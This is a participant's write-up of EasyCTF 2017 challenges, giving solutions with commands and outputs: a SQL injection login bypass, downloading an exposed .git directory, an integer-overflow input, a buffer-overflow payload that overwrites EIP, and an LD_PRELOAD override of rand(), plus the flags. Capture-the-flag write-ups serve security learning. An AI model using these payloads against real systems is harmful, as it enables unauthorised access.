EasyCTF 2017 Writeup
Hi, I am @jtwp470. I took part in EasyCTF 2017. This article is write-ups for the CTF.
Our team earned 2985 pts and I did 1080 pts.
https://www.easyctf.com/www.easyctf.com
[Web 100] SQL Injection 1
Easy SQLi. Input admin';-- at the form.
Flag: easyctf{a_prepared_statement_a_day_keeps_the_d0ctor_away!}
[Web 100] Edge 1
This problem is required for a little guessing skill.
When you access http://edge1.web.easyctf.com/.git/, you can see the internal git directory. And then I have downloaded the internal .git repository.
Flag: easyctf{w3_ev3n_u53_git}
[Web 200] Edge 2
This problem is very similar to Edge 1.
Flag: easyctf{hiding_the_problem_doesn't_mean_it's_gone!}
[Web 260] Web Tunnel
If you scan the first QR code, you can get bl9BimiQOpw99yAYFbbD. And then I guessed that it is the next QR file name.
I have written a script since it is hard to get it by hand.
#!/usr/bin/env python3 import subprocess import os.path import requests URL = "http://tunnel.web.easyctf.com/images/{}" def read_qr(image=None): if image is None: image = "DaicO7460493nYSuvLPW.png" p = subprocess.Popen( ['zbarimg', '-q', os.path.join("image", image)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False, ) stdout, stderr = p.communicate() if len(stderr) != 0: raise RuntimeError('Zbar throw error') return stdout.decode('utf-8').split(":")[1].strip() def save_qr(image=None): if image is None: image = "DaicO7460493nYSuvLPW.png" print("Downloading... {}".format(image)) r = requests.get(URL.format(image), stream=True) if r.status_code == 200: with open(os.path.join("image", image), 'wb') as f: for chunk in r: f.write(chunk) if __name__ == "__main__": save_qr() image = "{}.png".format(read_qr()) while True: save_qr(image) image = "{}.png".format(read_qr(image))
Flag: easyctf{y0u_sh0uld_b3_t1r3d_tr4v3ll1ng_all_th1s_w4y!!!!!}
[Binary Exploitation 100] Risky Business
This is a casino and there is a negative overflow bug. I understand that you need to earn 2 billon dollars to get the flag.
$ python -c 'print("99999999\n" * 10000)' | ./casino
Welcome to the EasyCTF 2017 Casino
Try your luck and gain access to our exclusive club!
Your net worth is: $100000
Please enter how much you would like to bet:
Sorry, I'm afraid you've lost :(
Your net worth is: $-99899999
…
Your net worth is: $2095067318
Welcome to our exclusive club!
Here's our special flag: easyctf{m4by3_w3_c0u1d_h4v3_d0n3_th47_b3t7er}
Traceback (most recent call last):
File "<string>", line 1, in <module>
IOError: [Errno 32] Broken pipe
user42884@easyctf:/problems/casino$
Flag: easyctf{m4by3_w3_c0u1d_h4v3_d0n3_th47_b3t7er}
[Binary Exploitation 120] Simple Rop
I overwrote the EIP and got a flag since there was a simple overflow bug.
$ python -c "print('A' * 76 + '\x1a\x85\x04\x08')" | ./simple-rop
Flag: easyctf{r0p_7o_v1ct0ry}
[Reverse Engineering 200] Lucky Guess
We should guess the number to generate from rand function.
I use LD_PRELOAD to overwrite rand.
// cc -o inject.so inject.c -shared -fPIC int rand(void) { return 1; }
This rand function always returns 1.
So, I injected it.
$ echo 1 | LD_PRELOAD=./inject.so ./guess
Guess? easyctf{aaA_tOucH_0f_luccK_47ca4e}
Flag: easyctf{aaA_tOucH_0f_luccK_47ca4e}
This CTF is very fun. Other writeups: https://writeups.easyctf.com/
